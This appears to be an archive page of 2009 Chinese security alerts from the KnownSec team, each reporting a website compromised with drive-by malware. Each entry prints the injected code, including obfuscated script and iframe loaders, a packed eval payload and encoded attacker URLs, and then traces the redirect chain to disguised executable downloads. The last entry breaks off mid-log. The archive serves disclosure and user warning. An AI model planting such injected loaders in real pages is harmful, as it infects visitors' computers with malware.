This theme is downloaded from wordpress themes website.

Archive for November, 2009

中国查票网被植入恶意代码

发布时间:Mon Nov 30 2009 18:22:03 UTC+0800
最后更新时间:Mon Nov 30 2009 18:22:03 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国查票网(http://www.chapiao.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.chapiao.com/

网页被嵌入恶意链接代码:
<script src=http://318x.com></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.chapiao.com/
    [script]http://318x.com
        [iframe]http://318x.com/a.htm
            [iframe]http://aa2233.2288.org/vista/360.html?gg
                [iframe]http://aa2233.2288.org/vista/aix.html
                    [iframe]http://aa2233.2288.org/vista/a4.htm
                        [script]http://aa2233.2288.org/vista/14.js
                            [exe]http://down.qq1ive.cn/upload/vista.css
                        [script]http://aa2233.2288.org/vista/15.js
                        [script]http://aa2233.2288.org/vista/17.js
                        [script]http://aa2233.2288.org/vista/16.js
                        [script]http://aa2233.2288.org/vista/18.js
                    [iframe]http://aa2233.2288.org/vista/amp.htm
                        [script]http://aa2233.2288.org/vista/ll.jpg
                        [script]http://aa2233.2288.org/vista/ll1.jpg
                        [script]http://aa2233.2288.org/vista/shine.jpg
                        [script]http://aa2233.2288.org/vista/llll1.jpg
                        [script]http://aa2233.2288.org/vista/llll.jpg
                        [script]http://aa2233.2288.org/vista/lllll.jpg
                    [iframe]http://aa2233.2288.org/vista/a90.htm
                        [script]http://aa2233.2288.org/vista/shine.jpg
                            [exe]http://down.qq1ive.cn/upload/vista.css
                        [script]http://aa2233.2288.org/vista/a91.js
                        [script]http://aa2233.2288.org/vista/a90.jpg
                    [iframe]http://aa2233.2288.org/vista/aix2.htm
                        [iframe]http://aa2233.2288.org/vista/af.htm
                            [iframe]http://aa2233.2288.org/vista/i1.htm
                                [script]http://aa2233.2288.org/vista/swfobject.js
                                [flash]http://aa2233.2288.org/vista/i115.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                                [flash]http://aa2233.2288.org/vista/i47.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                                [flash]http://aa2233.2288.org/vista/i45.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                                [flash]http://aa2233.2288.org/vista/i64.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                            [iframe]http://aa2233.2288.org/vista/f2.htm
                                [script]http://aa2233.2288.org/vista/swfobject.js
                                [flash]http://aa2233.2288.org/vista/f115.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                                [flash]http://aa2233.2288.org/vista/f47.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                                [flash]http://aa2233.2288.org/vista/f45.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                                [flash]http://aa2233.2288.org/vista/f64.swf
                                    [exe]http://down.qq1ive.cn/upload/vista.css
                            [iframe]http://aa2233.2288.org/vista/i1.htm
                        [iframe]http://aa2233.2288.org/vista/of.htm
                            [script]http://aa2233.2288.org/vista/shine.jpg
                            [script]http://aa2233.2288.org/vista/agg.jpg
                    [iframe]http://aa2233.2288.org/vista/aix3.htm
                        [iframe]http://aa2233.2288.org/vista/a10.htm
                            [iframe]http://aa2233.2288.org/vista/ff.html
                                [script]http://aa2233.2288.org/vista/if.js
                                [script]http://aa2233.2288.org/vista/ff.jpg
                            [iframe]http://aa2233.2288.org/vista/ie.html
                                [script]http://aa2233.2288.org/vista/if.js
                                [script]http://aa2233.2288.org/vista/ie.jpg
                            [iframe]http://aa2233.2288.org/vista/ff.html
                            [iframe]http://aa2233.2288.org/vista/ie.html
                            [iframe]http://aa2233.2288.org/vista/ff.html
                            [iframe]http://aa2233.2288.org/vista/ff.html
            [iframe]http://318x.com/b.htm
最终下载病毒文件:
http://down.qq1ive.cn/upload/vista.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:18
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 30 Nov 2009 No Comments

灵蛇网被植入恶意代码

发布时间:Sun Nov 29 2009 01:37:35 UTC+0800
最后更新时间:Sun Nov 29 2009 01:37:35 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 灵蛇网(http://bbs.pythonid.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://bbs.pythonid.com/

网页被嵌入恶意链接代码:
<script language=”javascript” type=”text/javascript”>
if(document.cookie.indexOf(’helio’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=’helio=Yes;path=/;expires=’+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’5.6(\’<0 4=3 1=”2://7.8.e/d/c/b.9?a”></0>\’)',15,15,’script|src|http|javascript|language|document|writeln|bbs|xcdx169|js|CVBIUQ|hx|img|images|net’.split(’|'),0,{}));}
</script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://bbs.pythonid.com/
    [script]http://bbs.xcdx169.net/images/img/hx.js?cvbiuq
        [iframe]http://bbs.xcdx169.net/images/img/o/hx.htm?t安全卫士o
            [iframe]http://bbs.xcdx169.net/images/img/o/yt.htm
                [script]http://bbs.xcdx169.net/images/img/o/ll.jpg
                [script]http://bbs.xcdx169.net/images/img/o/ll1.jpg
                [script]http://bbs.xcdx169.net/images/img/o/lll.jpg
                    [exe]http://bbs.xcdx169.net/images/img/hx.css
                [script]http://bbs.xcdx169.net/images/img/o/llll1.jpg
                [script]http://bbs.xcdx169.net/images/img/o/llll.jpg
                [script]http://bbs.xcdx169.net/images/img/o/lllll.jpg
            [iframe]http://bbs.xcdx169.net/images/img/o/t9.htm
            [iframe]http://bbs.xcdx169.net/images/img/o/ytu.htm
最终下载病毒文件:
http://bbs.xcdx169.net/images/img/hx.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:2
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 29 Nov 2009 No Comments

赢在中国官方网站被植入恶意代码

发布时间:Sat Nov 28 2009 12:06:33 UTC+0800
最后更新时间:Sat Nov 28 2009 12:06:33 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 赢在中国官方网站(http://www.yingcn.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.yingcn.cn/js/duanxin.js

网页被嵌入恶意链接代码:
document.writeln(”<script language=javascript src=http:\/\/hb%71.x%6Frg.%70l\/c.js?google_ad=11×227_ad><\/script>”);

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.yingcn.cn/
    [script]http://www.yingcn.cn/js/duanxin.js
        [script]http://hbq.xorg.pl/c.js?google_ad=11×227_ad
            [iframe]http://nib.xnum.cn/66/160sd.htm
                [iframe]http://nib.xnum.cn/66/avp.htm
                    [iframe]http://nib.xnum.cn/66/mpie.htm
                        [script]http://nib.xnum.cn/66/u.jpg
                        [script]http://nib.xnum.cn/66/ll1.jpg
                        [script]http://nib.xnum.cn/66/ul.jpg
                            [exe]http://nib.xnum.cn/l/gg.exe
                        [script]http://nib.xnum.cn/66/llll1.jpg
                        [script]http://nib.xnum.cn/66/llll.jpg
                        [script]http://nib.xnum.cn/66/lllll.jpg
                    [iframe]http://nib.xnum.cn/66/nod.htm
                        [iframe]http://nib.xnum.cn/66/glz.htm
                            [script]http://nib.xnum.cn/66/ul.jpg
                            [script]http://nib.xnum.cn/66/ll1.jpg
                            [script]http://nib.xnum.cn/66/glz.jpg
                    [iframe]http://nib.xnum.cn/66/real.htm
                        [iframe]http://nib.xnum.cn/66/myra.htm
                            [script]http://nib.xnum.cn/66/myra.swf
                                [exe]http://nib.xnum.cn/l/gg.exe
                    [iframe]http://nib.xnum.cn/66/rising.htm
                        [iframe]http://nib.xnum.cn/66/ofnt.htm
                            [script]http://nib.xnum.cn/66/ul.jpg
                            [script]http://nib.xnum.cn/66/hf.jpg
                [script]http://nib.xnum.cn/66/fa.js
                    [iframe]http://nib.xnum.cn/66/fa.htm
                        [iframe]http://nib.xnum.cn/66/ff.html
                        [iframe]http://nib.xnum.cn/66/ie.html
                        [iframe]http://nib.xnum.cn/66/ff.html
                        [iframe]http://nib.xnum.cn/66/ie.html
                        [iframe]http://nib.xnum.cn/66/ff.html
                        [iframe]http://nib.xnum.cn/66/ff.html
最终下载病毒文件:
http://nib.xnum.cn/l/gg.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:2
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

网站挂马记录 lk 28 Nov 2009 No Comments

任我游网被植入恶意代码

发布时间:Fri Nov 27 2009 14:42:10 UTC+0800
最后更新时间:Fri Nov 27 2009 14:42:10 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 任我游网(http://www.renwoyou.com/index.php)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.renwoyou.com/images/top.gif

网页被嵌入恶意链接代码:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{
document.cookie = “Cookie1=risb;expires=”+ Then.toGMTString()
document.writeln(”<iframe src=http://www.renwoyou.com/templates/new_digg/images/city.htm?tianxia width=100 height=0></iframe>”);
var a3825tf=”51la”;var a3825pu=”";var a3825pf=”51la”;var a3825su=window.location;var a3825sf=document.referrer;var a3825of=”";var a3825op=”";var a3825ops=1;var a3825ot=1;var a3825d=new Date();var a3825color=”";if (navigator.appName==”Netscape”){a3825color=screen.pixelDepth;} else {a3825color=screen.colorDepth;}
try{a3825tf=top.document.referrer;}catch(e){}
try{a3825pu =window.parent.location;}catch(e){}
try{a3825pf=window.parent.document.referrer;}catch(e){}
try{a3825ops=document.cookie.match(new RegExp(”(^| )AJSTAT_ok_pages=([^;]*)(;|$)”));a3825ops=(a3825ops==null)?1: (parseInt(unescape((a3825ops)[2]))+1);var a3825oe =new Date();a3825oe.setTime(a3825oe.getTime()+60*60*1000);document.cookie=”AJSTAT_ok_pages=”+a3825ops+ “;path=/;expires=”+a3825oe.toGMTString();a3825ot=document.cookie.match(new RegExp(”(^| )AJSTAT_ok_times=([^;]*)(;|$)”));if(a3825ot==null){a3825ot=1;}else{a3825ot=parseInt(unescape((a3825ot)[2])); a3825ot=(a3825ops==1)?(a3825ot+1):(a3825ot);}a3825oe.setTime(a3825oe.getTime()+365*24*60*60*1000);document.cookie=”AJSTAT_ok_times=”+a3825ot+”;path=/;expires=”+a3825oe.toGMTString();}catch(e){}
a3825of=a3825sf;if(a3825pf!==”51la”){a3825of=a3825pf;}if(a3825tf!==”51la”){a3825of=a3825tf;}a3825op=a3825pu;try{lainframe}catch(e){a3825op=a3825su;}document.write(’<img style=”width:0px;height:0px” src=”http://web.51.la/go.asp?svid=33&id=3103825&tpages=’+a3825ops+’&ttimes=’+a3825ot+’&tzone=’+(0-a3825d.getTimezoneOffset()/60)+’&tcolor=’+a3825color+’&sSize=’+screen.width+’,'+screen.height+’&referrer=’+escape(a3825of)+’&vpage=’+escape(a3825op)+’” />’);
}
}Get();
挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.renwoyou.com/index.php
    [script]http://www.renwoyou.com/templates/new_digg/js/tip.js
        [script]http://www.renwoyou.com/images/top.gif
            [iframe]http://www.renwoyou.com/templates/new_digg/images/city.htm?tianxia
                [script]http://www.renwoyou.com/templates/new_digg/images/top.jpg
                [script]http://www.renwoyou.com/templates/new_digg/images/ufo.jpg
                    [exe]http://uc.yi71.com/data/az.exe
                [script]http://www.renwoyou.com/templates/new_digg/images/right.jpg
                [script]http://www.renwoyou.com/templates/new_digg/images/left.jpg
最终下载病毒文件:
http://uc.yi71.com/data/az.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:23
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 27 Nov 2009 No Comments

千寻网被植入恶意代码

发布时间:Fri Nov 27 2009 14:35:02 UTC+0800
最后更新时间:Fri Nov 27 2009 14:35:02 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 千寻网(http://qooxoo.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://qooxoo.com/js/common.js

网页被嵌入恶意链接代码:
document.writeln (”<script src=\”http://k26mm.3322.or%67/google.js\”><\/script>”);

document.writeln (”<script src=\”http://sbsbsb.7766.org/3%32.js\”><\/script>”);

document.writeln (”<script src=\”http://sbsbsb.7766%2Eorg/32.js\”><\/script>”);
挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://qooxoo.com/
    [script]http://qooxoo.com/js/common.js
        [script]http://k26mm.3322.org/google.js
            [iframe]http://kanshou1.3322.org/sms/360.html?1
                [iframe]http://kanshou1.3322.org/sms/aix.html
                    [iframe]http://kanshou1.3322.org/sms/a4.htm
                        [script]http://kanshou1.3322.org/sms/14.js
                            [exe]http://www.htmlvista.com/upload/sms.css
                        [script]http://kanshou1.3322.org/sms/15.js
                        [script]http://kanshou1.3322.org/sms/17.js
                        [script]http://kanshou1.3322.org/sms/16.js
                        [script]http://kanshou1.3322.org/sms/18.js
                    [iframe]http://kanshou1.3322.org/sms/amp.htm
                        [script]http://kanshou1.3322.org/sms/ll.jpg
                        [script]http://kanshou1.3322.org/sms/ll1.jpg
                        [script]http://kanshou1.3322.org/sms/shine.jpg
                            [exe]http://www.htmlvista.com/upload/sms.css
                        [script]http://kanshou1.3322.org/sms/llll1.jpg
                        [script]http://kanshou1.3322.org/sms/llll.jpg
                        [script]http://kanshou1.3322.org/sms/lllll.jpg
                    [iframe]http://kanshou1.3322.org/sms/a90.htm
                        [script]http://kanshou1.3322.org/sms/shine.jpg
                        [script]http://kanshou1.3322.org/sms/a91.js
                        [script]http://kanshou1.3322.org/sms/a90.jpg
                    [iframe]http://kanshou1.3322.org/sms/aix2.htm
                        [iframe]http://kanshou1.3322.org/sms/af.htm
                            [iframe]http://kanshou1.3322.org/sms/i1.htm
                                [script]http://kanshou1.3322.org/sms/swfobject.js
                                [flash]http://kanshou1.3322.org/sms/i115.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/i47.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/i45.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/i64.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                            [iframe]http://kanshou1.3322.org/sms/f2.htm
                                [script]http://kanshou1.3322.org/sms/swfobject.js
                                [flash]http://kanshou1.3322.org/sms/f115.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/f47.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/f45.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                                [flash]http://kanshou1.3322.org/sms/f64.swf
                                    [exe]http://www.htmlvista.com/upload/sms.css
                            [iframe]http://kanshou1.3322.org/sms/i1.htm
                        [iframe]http://kanshou1.3322.org/sms/of.htm
                            [script]http://kanshou1.3322.org/sms/shine.jpg
                            [script]http://kanshou1.3322.org/sms/agg.jpg
                    [iframe]http://kanshou1.3322.org/sms/aix3.htm
                        [iframe]http://kanshou1.3322.org/sms/a10.htm
                            [iframe]http://kanshou1.3322.org/sms/ff.html
                                [script]http://kanshou1.3322.org/sms/if.js
                                [script]http://kanshou1.3322.org/sms/ff.jpg
                            [iframe]http://kanshou1.3322.org/sms/ie.html
                                [script]http://kanshou1.3322.org/sms/if.js
                                [script]http://kanshou1.3322.org/sms/ie.jpg
                            [iframe]http://kanshou1.3322.org/sms/ff.html
                            [iframe]http://kanshou1.3322.org/sms/ie.html
                            [iframe]http://kanshou1.3322.org/sms/ff.html
                            [iframe]http://kanshou1.3322.org/sms/ff.html
        [script]http://sbsbsb.7766.org/32.js
            [iframe]http://kanshou1.3322.org/sms/360.html?1
        [script]http://sbsbsb.7766.org/32.js
    [script]http://un.so.gougou.com/js/searchview.js
    [script]http://s.vdoing.com/u/68/35112.js
最终下载病毒文件:
http://www.htmlvista.com/upload/sms.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:42
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 27 Nov 2009 No Comments

电脑教学网被植入恶意代码

发布时间:Thu Nov 26 2009 23:06:17 UTC+0800
最后更新时间:Thu Nov 26 2009 23:06:17 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 电脑教学网(http://www.diannaojiaoxue.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.diannaojiaoxue.com/

网页被嵌入恶意链接代码:
<script language=javascript src=http://%64%78%76%2E%78%6F%72%67%2E%70%6C/x.js?google_ad=101×30_ad></script>

挂马分析:
[root]http://www.diannaojiaoxue.com/
    [script]http://har.xorg.pl/c.js?google_ad=11×320_ad
        [iframe]http://lir.nna.cc/22/1360sd.htm
            [iframe]http://lir.nna.cc/22/avp.htm
                [iframe]http://lir.nna.cc/22/mpie.htm
                    [script]http://lir.nna.cc/22/u.jpg
                    [script]http://lir.nna.cc/22/ll1.jpg
                    [script]http://lir.nna.cc/22/ul.jpg
                        [exe]http://lir.nna.cc/l/gg.exe
                    [script]http://lir.nna.cc/22/llll1.jpg
                    [script]http://lir.nna.cc/22/llll.jpg
                    [script]http://lir.nna.cc/22/lllll.jpg
                [iframe]http://lir.nna.cc/22/nod.htm
                    [iframe]http://lir.nna.cc/22/glz.htm
                        [script]http://lir.nna.cc/22/ul.jpg
                        [script]http://lir.nna.cc/22/ll1.jpg
                        [script]http://lir.nna.cc/22/glz.jpg
                [iframe]http://lir.nna.cc/22/real.htm
                    [iframe]http://lir.nna.cc/22/myra.htm
                        [script]http://lir.nna.cc/22/myra.swf
                            [exe]http://lir.nna.cc/l/gg.exe
                [iframe]http://lir.nna.cc/22/rising.htm
                    [iframe]http://lir.nna.cc/22/ofnt.htm
                        [script]http://lir.nna.cc/22/ul.jpg
                        [script]http://lir.nna.cc/22/hf.jpg
            [script]http://lir.nna.cc/22/fa.js
                [iframe]http://lir.nna.cc/22/fa.htm
                    [iframe]http://lir.nna.cc/22/ff.html
                    [iframe]http://lir.nna.cc/22/ie.html
                    [iframe]http://lir.nna.cc/22/ff.html
                    [iframe]http://lir.nna.cc/22/ie.html
                    [iframe]http://lir.nna.cc/22/ff.html
                    [iframe]http://lir.nna.cc/22/ff.html
最终下载病毒文件:
http://lir.nna.cc/l/gg.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:32
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 26 Nov 2009 No Comments

本科网被植入恶意代码

发布时间:Tue Nov 24 2009 18:23:45 UTC+0800
最后更新时间:Tue Nov 24 2009 18:23:45 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 本科网(http://www.benke.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.benke.cn/

网页被嵌入恶意链接代码:
<iframe src=” http://rx0041.8866.org/xman/2.htm” width=111 height=0 border=0></iframe>

挂马分析:
[root]http://www.benke.cn/
    [script]http://www.benke.cn/images/js/common.js
        [iframe]http://rx0041.8866.org/xman/2.htm
    [script]http://www.benke.cn/images/js/login.js.php
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
    [script]http://www.benke.cn/data/js.php?id=12
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://rx0041.8866.org/xman/2.htm
    [iframe]http://rx0041.8866.org/xman/2.htm
        [iframe]http://107jj.cn/x107/xx.html
            [iframe]http://107jj.cn/x107/yt.htm
                [script]http://107jj.cn/x107/u.jpg
                [script]http://107jj.cn/x107/ll1.jpg
                [script]http://107jj.cn/x107/ul.jpg
                    [exe]http://d.xwsfx.com/1.exe
                    [exe]http://d.xwsfx.com/xx/x107.css
                [script]http://107jj.cn/x107/llll1.jpg
                [script]http://107jj.cn/x107/llll.jpg
                [script]http://107jj.cn/x107/lllll.jpg
            [iframe]http://107jj.cn/x107/ytu.htm
                [iframe]http://107jj.cn/x107/of.htm
                    [script]http://107jj.cn/x107/ul.jpg
                    [script]http://107jj.cn/x107/hf.jpg
            [iframe]http://107jj.cn/x107/t9.htm
                [script]http://107jj.cn/x107/ul.jpg
            [iframe]http://107jj.cn/x107/yut.htm
                [iframe]http://107jj.cn/x107/ytfl1.htm
                    [iframe]http://107jj.cn/x107/x1.htm
                        [script]http://107jj.cn/x107/swfobject.js
                        [flash]http://107jj.cn/x107/./x1.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                        [flash]http://107jj.cn/x107/./x3.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                        [flash]http://107jj.cn/x107/./x4.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                        [flash]http://107jj.cn/x107/./x2.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                    [iframe]http://107jj.cn/x107/x2.htm
                        [script]http://107jj.cn/x107/swfobject.js
                        [flash]http://107jj.cn/x107/./x7.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                        [flash]http://107jj.cn/x107/./x9.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                        [flash]http://107jj.cn/x107/./x10.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                        [flash]http://107jj.cn/x107/./x8.swf
                            [exe]http://d.xwsfx.com/xx/x107.css
                    [iframe]http://107jj.cn/x107/x1.htm
最终下载病毒文件:
http://d.xwsfx.com/1.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:3
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 24 Nov 2009 No Comments

中国节能减排网被植入恶意代码

发布时间:Mon Nov 23 2009 18:42:01 UTC+0800
最后更新时间:Mon Nov 23 2009 18:42:01 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国节能减排网(http://jnjp.com.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://jnjp.com.cn/job/js/js.js

网页被嵌入恶意链接代码:
document.writeln(”<script language=javascript src=http:\/\/ne%66.xo%72g.%70l\/c.js?google_ad=11×111_ad><\/script>”);

挂马分析:
[root]http://jnjp.com.cn/
    [script]http://jnjp.com.cn/job/js/js.js
        [script]http://nef.xorg.pl/c.js?google_ad=11×111_ad
            [iframe]http://gda.nna.cc/77/4360sd.htm
                [iframe]http://gda.nna.cc/77/avp.htm
                    [iframe]http://gda.nna.cc/77/mpie.htm
                        [script]http://gda.nna.cc/77/ll.jpg
                        [script]http://gda.nna.cc/77/ll1.jpg
                        [script]http://gda.nna.cc/77/lll.jpg
                            [exe]http://gda.nna.cc/h/cc.exe
                        [script]http://gda.nna.cc/77/llll1.jpg
                        [script]http://gda.nna.cc/77/llll.jpg
                        [script]http://gda.nna.cc/77/lllll.jpg
                    [iframe]http://gda.nna.cc/77/ofic.htm
                        [script]http://gda.nna.cc/77/ofic.swf
                            [exe]http://gda.nna.cc/h/cc.exe
                    [iframe]http://gda.nna.cc/77/nod.htm
                        [iframe]http://gda.nna.cc/77/glz.htm
                            [script]http://gda.nna.cc/77/glz.swf
                            [script]http://gda.nna.cc/77/glzz.swf
                                [exe]http://gda.nna.cc/h/cc.exe
                    [iframe]http://gda.nna.cc/77/real.htm
                        [iframe]http://gda.nna.cc/77/myra.htm
                            [script]http://gda.nna.cc/77/myra.swf
                                [exe]http://gda.nna.cc/h/cc.exe
